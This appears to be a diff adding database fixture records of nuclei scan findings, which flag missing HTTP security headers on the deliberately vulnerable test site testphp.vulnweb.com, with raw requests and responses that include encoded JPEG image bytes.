"http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests", + "discovered_date": "2024-11-13T02:42:32.908Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:27 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/</h1><hr><pre><a href="../">../</a>\r\n<a href="pmwiki_2_1_19/">pmwiki_2_1_19/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 947, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/7.jpg.tn", + "discovered_date": "2024-11-13T02:42:33.167Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/7.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6458\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:21 GMT\r\nEtag: "4dca64a1-193a"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0004\u0005\u0007\u0003\u0001\b��6\u0010\u0002\u0001\u0003\u0003\u0003\u0002\u0004\u0005\u0002\u0007\u0003\u0001\u0002\u0003\u0004\u0005\u0011\u0012!\u0006\u00131"A\u00072Qa\u0014\u0015#q�B�3CR���������\u001b\u0001\u0003\u0003\u0001\u0001\u0004\u0005\u0006\u0001\u0003\u0007\u0002��0\u0011\u0001\u0003\u0003\u0002\u0004\u0003\b\u0003\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0011!1\u0012\u0013AQaq�\u0006\u0014"2�������\u0015B��\f\u0003\u0001\u0002\u0011\u0003\u0011?��I�KMc��������^�ܡ�y!�2��w\u0005c�ϓϑ�\u0019�|x�\u001bT]K=$4n�2�\u0014ʌb��\f�\u0018,1φ�G�Qz~��=t�W�\u0002\u001aF*�O0uw�G�����|��q�7<6nI��<��\u0012)]%?��@�\u000ez�q���\u0014\u0003�s�j~��E ����μ��\u0017�Rׄ�H�7Y_$�5��T��\u0018Bʤ���������}\u001d�&�#R���O�d>�� y�\u001c��\u0007VR\u001c�\u0001u�v�4*Q�\u0018�� ���ަ\u0003\n\u0014�;���\f�ppt5\\��a�l\u0006��:�L��\u00059\u0007$�5ǧ�3����i��vb`�J�d�\u000f��jNﶃ:B�u�)�2\u001fS;�\u0014�"�İ�\u0007r�\u0004K1\u0003h�\u0003:.W��Y���;�w\nCI9������\tϝ3w�H��D�p�f�y�\u000b\rp���\u00171�~\u000e7x϶uWCw�D�\u000b�\u0012E@�\u000e�\u0018\u0012FAR}���\u000f\u0007\u0004\u00105:V���r����0�ѐ7W\f��\u0017n04� o}r�N>��+\rb�':�6Ll\u0011��8lx�Bt���c+[����\u000fIt�j�Y!��!�^�qʑ�,{�疉q�_�����d\u0014��G$P��\n\u000eԳ��\r�R����<g\u001cx�]�H�\u001dT�J�VشQ��l�dd�\u0003$g*\b\u0004��:�r�\u001bg�M$�\u0004h����V�Km\u0018珮F�E\u001bc����\u0018�󟲧�Ϛ�\u001b �S�v�������\u000b�\u0012�\bc}�PHq��������KQ\u001cK�WD\\��8��\u000f�Ӭ��R��i�#U+:Y�JJ���2B��\fW ��A�q�\u0019�Ρy�i��;^\u0013�4�8\u001f}}a|\u0012�\\Zu���\u0015\u001eP���±�\u0004�\u0006�//_\f�OC��\u0014KP�Xa/�j�!F\u0007k8;�@%x$`�Rx�_U\n��b��I\u0005E\u001c��%1�8�;����`����\u0007:Ww��L��rF�P{;8�����u'���\\::�b\u00163G�B�!;Ӎ�\u001caW����<\u000fa�$�`s���+䦪Ji�\u0018\u0012Aߌ+.\u001d_��\u0005P��]X\u0001��6�Z�8�\u001eK�\u0018D\u0019c�\u0018\u001a�����k��[o4O\u0015nk[����}ƚ�}�7u�Ĵ3H��M�7q&��*����N\u0007��p�ա�w�q���~�\u0001�~���=��E�锳�|��Lnp�\\3$\u000e���1����\n��;�B����(b�G�8c�\u0001vg,Ac�\u0013$�\u0005�J^�^=����ϝ\nu+�QG:\u0019B\f\u001c�#��΄�`q\u0012��M�\u0013[[�C�x�]��\u00158�4F:s\u0013"���RRT�y ���|���R�3��\u0002��ܮ}\u0011=ʎ\u0016���(bhi`H�\u0011\u0005";\u0011F�I�\n�?0b��:z�=L�4ҁ�\b�\u0001G\u0007�}������<���\u001c`t�?�8�X\u001bN�$/�[Vt�<\u001c���imS�@er�C\f\u0011�\fu\u0005������B��v�C�8� �8� ��D��uC�Z�H�s\t��Ͼ|\u0018�>O�\b\u001e��� ��\u0016�\u001d\u001c�!�>(*�Vl�PϲX�gqHӘ�]��\t\f��6L\u001cn8q.\u0015A\u0018!���5����'���\u0013�\u0016\u0013\u0006\u0014�9`�\u0005\b;9\u0007$�\u0003�hJ��ӳ�I�u=]\u0015X\u0002�\f�\u000b�'�T�_<����\u0001l��̴\u00157\u001b|�!�Id�\u0015-\u0018��w+6_�\u000b����|���jJ:��r�,\f���L\u001d�����5\u0015%W\r�\u0013��p5$�\u0016�iHऎ\u0018c\u0011"q�\fs�~�\u001f�����{�(\n1��7\u001c}��mH�ީ�\u000f�2f�i=��L�������a���2F�\f$esɩ�yt�\u0007����w\u001d7��\u0003g��':ނ�Ls�Uq\t#`@ �}KsƸK�5�j\u0016��i�@�].\u0004sȒƵ\u0012\f���퐟�p��\u0004����d\u0012\u0015��*�t�U�Lf�a\u0006A\u0002\u0017S\u001b�;�������\f0q�\u0005�u���_P6ᐰ#�\n��\u0011�\b��\u0013[)�p����KOz��r��\u0006p�$���r��[y��M;\u001ao�4���!f, /�ع^\u0010�`�\u0005\u0001ƢuM/P��%���L��1H���e�5��&с�(]��!G\u0003R:�\u0014J\t��4��e�y���%�\u000e���|g\u0019�\u0001$�~f�=Uj�u\u0015�Jj��AQG:�-c���������\u000eq��#��ˑ����~r0s��˷n�����l�s1���GIw�\u0012CW\u0004���v�s�G\u001c\u00022\u000e\b������sQQ\f��\u001dE-<2"��� �eV��q��9��r\u0018����0�Xk�\u0006����\u0014J�u��\u000e��\n2�\u001d��2.\u0014r@<x�k=MT߄\u0012,P��,-Q\u001a�r��=L1�p`s���x�=�hk�#9#ӧ�\n�C�'�f�>�h��%���^mv��K�]R�5=��;>%œ�8\u001bO,7z�g蹵%ud�2=�R:�w�D\u0011�\u0013�\u0017n���\u00047<�\f�\u001b�AƑ��Aq�|=���-p\\j\u0016&�U\u0003d����X�0US\u0019l`\u0005*��g\u0015���x��!�����\u0014HY���9�\u000f��og�k�6��8;��&�Vq�#ܕ�����z��T�9q\u0018\nN�p\u0007�Q��-\u0018��\u001aeK�B\u000f ����\u0017d.*Ȱ�U=��M|���i�A&�0ʮ��A\r�O>x��\u000f �r�^����b��i]c�!M嘜\u0001�;� \u0001�<�3_QJ�j�\b\u0012/y�Ā(p�,�W\fW!q�\u0004z��Ƞ��e�\u0011�_Qr��Ă\u001bz%E<�����Gc�S\u0012�|����3��)�"�{\twq���㺴�����̍ÇM5�׺�@����V�m��\u0019dd��d��!]��)��%Gd�\u0017h݃��wr���{b�jƪ\tQOH#\u0005�y�1���7�p\u0014��\u0017\frqik�K=m<�co����r�\u0015��ͶH"pCD���\u0013��@*FA\u0019:�q��\u001c��Qx�?��JcV���~�&U�\u0018�\u001e�ަ%@!�\u0018k���TD̐5\u001d����[��(��;���\u001b}�.VO̩%�\u0013��B���\b+�FőNH��\u001c0�:9��CGM\u001c\u0014�G\u0014(X�"�\u0001>O�p�>p��4\u0003C%e��=\u0015E��FD�1��ң\u0010��Xn�Y\u0018\u0016![,U�쓫UCMM\u001b�m\u0013\u0011����ŞA;\u0004��q��(\u001fh�t\u000e�G��t��\n�\u001b?���� �~���\u0007��eH\u0016\u0015!�\u001c�rc��"eo���׌�����\f!)\u000eO��\u001b�ttQ��p\fq�#2�Ԝ\u0003�\u0007?��[���5]Z�Dp��6KHi�F�����d k�C��\u000bURW%1h�f�0LNHʹ\u0005pp�[$\u00128�1�����4k4k\ftp�Q�j\u0014\u0006\u0005���\u0004d�b>��涁d1\u0019^I;_/u�`�U�Ͼ�PO�(\u001eڪ�Sb'\n9�\u001a����;�Q�\u001bco�V��(�o.�`\u001e�砺��=\u001bU4�_s���̴�0H�`�]�%�ڛd9\u001e��ǖ�jΣ�{���%m��$��Mٍ�i�A�~�\u0007 ��g!��+����X��G'|�L��\u0015�U5��F\u0019��8���^K\u0013C̣-9�m\u0015<w\u0010�\u0019��{���|A�Z��qhb��X)��V.�\n$��V��>�Ab����3���m����Z�����h�H�ե��nL��!M���#:=�-Cp4��V��e�d��\u0004��$�]�9\f�\u0001�<c\u001ccZGZOWm����Ve���5c*&��O�n�9<����5΢�ݣ9\u0019�����MyBQ�wY�w�*\f\u0001fWڏ\u000e��\u0012��\u0019�8]�a\u0019\u0004��\u001fQ[SU���\u001c\u0014�ћ\\Tp\\.\u0017j�V���!\u000b\u0012�QcUe-�d����P;����E4d�)h��3���� \u0012\u0001ǶH��uk}ɵ-.����gO��7;G���-ӿs�N�VDA\u0019ld�J�2$\u0003��p���7U.�Y%��Z%�����e�\u0003~>V%X��'����\u0018%z�WM;F�v\u001f�����é����}?UCp�[�vj�Tn��~�ɂ�F1����O,t��q�\b��Ϗ�T��m��8;��+A�KUl�W$�{c�;��ȩj'W\u0006\u0005A�\u001bҪIS���<��\rc\u0015\u0015�_���qV\u001d�aI6\u000e��]�\r�U���\n�[WY]h�J��m��WYd�����J�(��Q\u0013v��@_�Q��s�ܱ��5��A\u0007b��9h�+$�UWA�Hm�GX�\u0003\u0003f�ƒ��Y%����.'\u0019=3���\u0015E�����\u0001���r��A�x^E���@'����\u001af\u001bF��6��@�<�",c��J)c�!|\f�g�\u0001���%�\u000f��m!xo��\\���9���<U���<�\r��OG\u0019�D�3�F|�i�*������.�\r\u001fv��X;��h{���\\\u0005]�rJ���<�:����D�;!��"�v�z�V+����O�V���xRV=Ѝ�\u0004��D���j��\u0015$�M��:\u0003�T���ۜ��[;�\u0010IfR�N\u000b\u001e[�\u0006p<h�)�#Ս\u000fo|�\u0010e:�|�\u0011��c��\u0010�}�uf�\fq�������-Mgj&bx\u0003?MA��e\f$�H$\u001c4r.�S�y\u0007�\u001f��t�\u0007�:�c�yo\u0018\u001a\u0005"��\u001b��5c�����z\u000e\u000f��Е\\�T��[N��;��*�i��U�e�$c �yʰP��[\u00168��\u0014\u0014o�<=\u0013�SG\u001f\f�3�\u0002|ꅪ袞W��Zр�;�\u001e\u0018{6>d?�\u0006\u001b����}_��Y\u001fn�R�H\u0003,sQwx`;\u001dH �\u0018��\u0004{\u001d\u0015^�n���vJ�=\u001a\u001b�D��2mٖ*@E\u0001�*\fP\u0007�F2F�nW8�\f' �d\u001d��m���o\u0017Q�[t\u000f�j���e\u0013R�OGN�ݎ�\u0011\u001231J�!US�2\b��r\t'ZM��Yx��d\u0011��W�Y�*e_F\u0019\u0015��h��K\u0002���Iпº�T\r;�f���Q+�������;{{�g�\u00060�c�t۽eB[n]�I��Pc\u000b\u0018\u0007\u0001pp\u000f�\b9����\u0005d�\u0013?��\u0001��s��׿�4T�������|J��\u001a��\u0015�6���i\u0016)���\u0001e��rB�\u0007��\f\u0002\u00179\u0004\u0003�z:���G/e@���Z��j��=\u00038P?P��>\u0017\u001bpwj��\u0015l7\u001b\u001d�\u000b�(��\u0011\u0011hX�����\u001f(\r�b\u0014��\u0017\u0019k��m���r��jAFn�R1�R�!�=�n�h-�8�=@s����5��7G�����P5\u0014�Ԟ'\u0015�ݮL�)G }�I֫���g\u0002��\u0005��cC\u0015K�d�Ͼ>�i�'v͏��\f�\t��#w_���:k$��ֺ���I\u0017a@\f�͂�\u0001l�2�3�S����������4v0��02����\u0001$\u001e��ާ���ʐq�*L�\\\u0005{DP�Wi��V�*AK��ʛ�-$S�L�5�\b��I\u0004\u000f\u001c�e���,��X2�����#`\u001c��[`>��`��1*�{��1b\u0014�T����\u0004�G�\f[�����4�Y]�E\u0010�!��\n���\u000f��\u0015\u001c��\b��\u000bE(���q�<���Γ<#\u0019E���\u0007�՜S}1�\u001d\bQ�IRf\u0014�\n�K�y�\u0010��0��\b\u0018��d��8��3�u�H��\u00063"�\u001e�\u0004�G�\f\t\u0007�i�U�9�����*-ҵ��\r\u0011\u0014�q���-ܳ��R\u00179S�X�A�\u0006\u001c0#ʌ�FG�A��\u001fC�B��c�kl��0��\u0015��:\u0019\u0003۸U�3Av�]��Z�yv���0dm�\t\u0001���v.p\u0006\\~ڕOr�E���\t)��\u001b�\t$\u001b{�=���8\u0005�ό�y\u0007T�N�P!�z��V�gJh���ul*�KnU���\u0003#E6n���\u001b\u0005'P\\\u001e��S\u00075�,�;�\u001d��[i,\u00102���n�s�LUܤ�J8��\u001d���'��a��_\u0017\u0017\u000e\u001c��W�Q\u0006J�<-�Q����pA��\u0011��t��\u001a�����U���\u0012\u001aVffyQQ1�A\u0019Q��C`�DղR,]�Y�,^'ĉ\u001dJ+�,>W��Xd`�\u001c\u0010u��1��Id���As5MJ�:KT�+\u0018�f�-�,��x�q��[�]���������^�Z�K�����B��<�p�.�\u0012���\u0003�q�\u0019��0H`\t*qQ]++J�K$/,f)\fNW��ʶ<��<k���N�ʉ(�\u001a�\u0001-+2��8ǥW�1��H,I$�\u001d\\�mt�+�2K<�����X��\u001fՖl�����^��bi�n�[@b���"n���Ώ���<���EZU�t\u0010�\u0015,��WԹQ�F\t<`6���\u0010��K��l\u0014��̴��B���Ű�s�� ��ƾ|���])^��\t���7Ԏ\u0007k��|��9\u001e�\u0007�g�/�3T��2PR��[䥑��z��L\u0018��W�!�eJg#\u0007��u�\n|\u00170\u0002�~�_Ң�s���'��QY��n\u001f���J��\f��%cR\u0017�@,Wv|��G,�?X�kii�\u0015@��a}��G!,P\f�\u000f|�\t<\u0003�h{�� ��f\ti��2��2����\u001c��X�\u001c�\u001fvÝہ\u0019\u0007X���i���\n���m E,���dv�\u0017R0�\u0001�\f��\f���E%��4�\u0001g\u001e#l\u001f��DI8n���i���?m�D�l�U�\u001dxl6<��\u001f�\u000f��+���� !�x�⎵�\u0005�^�c�\u0013hR\u000eO��,Ř�\\�9ZZ��1��du\tU\u001b�$�>�����3h�j��\u0015�\fdp]\u0002'���\u0019S���8\u0004k@�ė��q\\n۪�\u0019e�Y\u001d�QZF$�\u000e\t��'?3\u000f\u0007\u001aZZAZ��\u0018�\f\u001e>���d����z��\u001b?Kt�[��~k\u000b�U������j1�`\r���\u001f�`\n1#,x\u0007KKU\u0016�L\u001cG|��O^>0\u0017���S$K;�����6bU\u0001bH\u0003<d��\u0016P�r�\u0018�\u001aZZmnF\bJn��aL.����RQ�Ϩl�5\u000f"�S_\u0005;��kly\u0002�\u000f�\u0007Ζ���$S���\u0003B\u0001��U_\r�puWX��wf��&\f�,m���-��\u0002F\u000e9ǂ5�X�d��\u000e��鈒�A\u0014i\u0014O�,\u000b\u0014;���ң��Ϝaik�{@���\t��\n���N�%��IGE\u0005������\u0018鷡U%�\t\\�\fĐ���\u0007�A9ڸ1�J����ui_RgM�Yʾ\u000fv#��r}M�?1�x��֩>*Fqk���9�E��T�5L��\u001bܖ8\u0018\u0019Ή�\u0016��A�6x�j��\u0013ԤNar��\u0010\b�A������w\u000f\u000f�\u0011�:�\u0007�hi\u001a�4��)�nW\n�i�a$B\u0002E6\u001dP�\u0003��d���i\u0005���D�T�(�\u0019\u000b�\u000br�P��@��\u001f�KK\\�W��X3տ�՟#�VY���C\u001d\u0002�v;�U��\f�HwaDn���1������m��VR�\u0013;,Ԑ�6�\u000e\u0019�$\u000e<iij���LM\u0005.��+��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 948, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19", + "discovered_date": "2024-11-13T02:42:33.410Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests/pmwiki_2_1_19 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/pmwiki_2_1_19/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/pmwiki_2_1_19/</h1><hr><pre><a href="../">../</a>\r\n<a href="scripts/">scripts/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 949, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/8.jpg.tn", + "discovered_date": "2024-11-13T02:42:33.681Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/8.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4139\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nEtag: "4dca64a1-102b"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0003\u0004\u0005\u0001\u0007\b��;\u0010\u0001\u0003\u0002\u0004\u0002\u0006\b\u0005\u0004\u0002\u0003\u0001\u0002\u0003\u0011\u0004\u0005\u0012!1AQ\u0006\u0013"aq�\u00142T�����$B���\u0015#3�Rb4r���\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007��(\u0011\u0002\u0001\u0003\u0003\u0004\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011!\u0004\u00141\u0005\u0012AQ\u0013\u0015"B2ab���\f\u0003\u0001\u0002\u0011\u0003\u0011?�S�K��@�\u001bU\u0010z�~\u001d*D���@e��\u0012+�oQ��Vߩ�}I�����{9%L�Oy\u0014ÃX�z�?��h�"2��0\u000f�5ޤѺ�\u000bU��Z|\f���vv�����\u0003)����i��R���Eã�o�t\u001f\u0014\nc�5�uB�\u000fq����\u001b���t�H�)�l\u0007�� N\u0015{\u001e�\u0003�U]�7\u0012`�\tM��aT��h�k�-&\u001el)=�\u0002�F\u0013k��\u0018���W6��$��S��u�\u000ey�eQ��\u0015�I9g��\u0017�0$�\u0015��56\f�m��#�����N�Oq�����Ʋh|���I/2\u001a,-���$w\u001d~uE�[ ������V�����"<�H�\f��;�\u0015R+.A��G.F\u0018K\u0003vTڞ�e\u0013��>�\u0002p\u0007`�_�:�\u0018\u0002�0A�ދ�C�\\!�\u001eJ�����\n�H�U+Z�wQkXBS�m�\u0014װ�3B�Ȏ\u0019������+J7�\t��hI���\u0016j\u0003�G΋��{C?\u0018�\u0013`6�d��3�=s��`��(�ȟ3�����\u001b'��wཥ��W\u0005�M|b��\u001fW<ظ\u0007�\t�\u0015Q�����\u001e%?J3�\u000f�����[\u000e7\f�b�օt� 3�.\u0006���趹\u001f����FYl=���R�a�\f�B���YO�\u001f���C_:i��ײ��FY,=���R�a�\f�b���YO�\u0012�\u0007�e@Gq�Յ�&G���[\u000fhg�\u0014�X{C?\u0018��\u0019t� \u00118j�\u0012�\u0011�jSa;2G�\u0013F�,=���Rɇ�C?\u0018��#��`8�ZOe$yԨ�RwfO2h�%��3��Yp�hg�\u00147�}6��\u0010\f(��\u001esK��De\u0003�Q�\u0016#k�~1K�^���(oE��~��0����OvSL\u00188V�\bO�@��{K_\u0018�E��埌Q�1�NH�\u001c��� M������\u0013���;W$�ӷ�\r�\rZ�$;m�c(\n�T\u0001�I�4��~��Ņ�׽z\u0016�\u0014 \u0001�E�$�xk\u001bl8p�ϨR�\b�\u001d-Ŵ;���L!��V\u0016�\u0002�+�\u0003��\u001f|�u��b\bk�.:�\b�LƁZ�Ѓ�X���h/���.B�eH))!! H�!;lg�0▪E�}P}�(���)#(%[\u001d���YWQ�J�.���]��b/\u0007\u0002\u001cs�@P$����M����\u0012�SM�^\u000e-A\t܉�G\u0018�\u0016��o\u001crԼ�E�u�+*���F�.���V��˶�\u001a��-#+�7\u0004J\u0013�a\u001a� ��\u0002$M\tu\u0019���;e��Yx�(�6\u001c�!\u0004�Y���\u000e����b��\fN�\u0019E�n��#�m��9���H1�\u001f��ڠ��Ɉ���[j\u0015�!�0��\u0003\u0007�&"\u000e�j)�8��Iq�f��}��\b\n'|����Y+7r�J\u0017�7�I�U~�����Gajȩ�>`x��Ķ��8��6�]:P�FE�+*Q�\u0012F�\u00065\u0010�Tq�C\u0007yƔ��\u0010��\u0011�=��\u0019'�y�v�l�p�_\fqn+�]����$q\u001eQ�?\u001aYW����\u000fd}\u001a��q7\u0015��۔��\u0004��\t\u0002\u000f\u00025\u001ae\u001cF���8�$�\u0016��\\C\u0004f��2�\b�\u001a�5\u0011���\u0002��î[�KL�խh%N\u0013�h�\u0004�\u001c\u0001o:�d[�]�Y\\��бd�W(\u0005��\u0003S�\t�\u0013��Ũ�{�\u0013�<X4��1\u000b��,ߘ\u0004���\u0012��<9H��4�X��\r�p]Y�\u0003�\u0019"7�Q�\u0015�/�ww�u,\\:۩�\b�*ˤ�7\u0018���o�����`k�\u001a]��mEJ%Dd��"gS���\u0013�=\n�he��1%J/\u0016\u000bn�Q�۾�\u001fq�<م$�j�=.�R�/�S�hO\u000e�\u0012�$��������Ze'e\r9@�֯�ݦ'���\u0012P\u0014�\u001c���se��\u0003A��jZ�����-4�Y\u001bk����r�TBGorv\u001bӏK���}I\u0003i\\��7��0���T�\u00044�k�\u001d�$��;N\u0013vm\u0014���ܘ�Gw\u0012|\u0006��������\u0005�\n�.�p�t����r�皤\u001d0�*���\u001d�SC\u0016WV�o�9�|��C���J���C"4���\u0013R�v�.��\u0019�\u001bG��VHL\u0002\u0006i�\u0006����ޒ]B\nV�\u0019i�l�β�F\u0012\u001ce���Ќ�@\u000e�>\u0014��\u0016�YԄ�ⳒN�����x�\u0016�u���\u0010BB�\u001c�T���\u001c7�4.����x�(�V\bB3��6�غ��/�\u0012îu��$�W]@�����\u0016�a͵�4\u0014\u001a�\u001ey�\n@�'��\f�\u0004F��\u000e\u001a�{���ܦ�(��Fl���*ݻ*��T\u0014����Q�*\u0007�\u0006i�"���\u0010�t���!qw��ݷ�>�\t�cI\u0011��Y�[\u00168��-\u0015t�>��P�ҳ\u0015&`(�\u001a��üP-���1��H\u001dA=��ӕ\u0016٭�p�mՙ�tR\u0002���\u000f�w���8G)\u0007�K�]N4�Wn�\u0010�\u0003,�\fs\u0007]�3"^HPK�F�H\u001a�p�oDNa]K�2��HP\b��y�}��U�,57=Z�n��1\u0019c�����U�\u0016\u0001c\n͉�\u0016���U��\b��Jں��j���\u000e��B\u000bn%3\u0005�F�{ֵ�\u001bl\bB\u0019lI��))H��\u0003a�\u001d��S\\�n\u001dYm$+)�刐 �\f\r�����u'��0��Ҝ�i!JP�,L�\u0001\u001aL��\u001fJ�|�,p�KRB^t\u0005����h;�j�Ͳ�ԧs��H�V��m�\u0001�����C8�,�!���;�bg:�\u0004�5�\u0018\u001a��.�\u001e����[�\u0002oqE�\u0013n��R\u001a 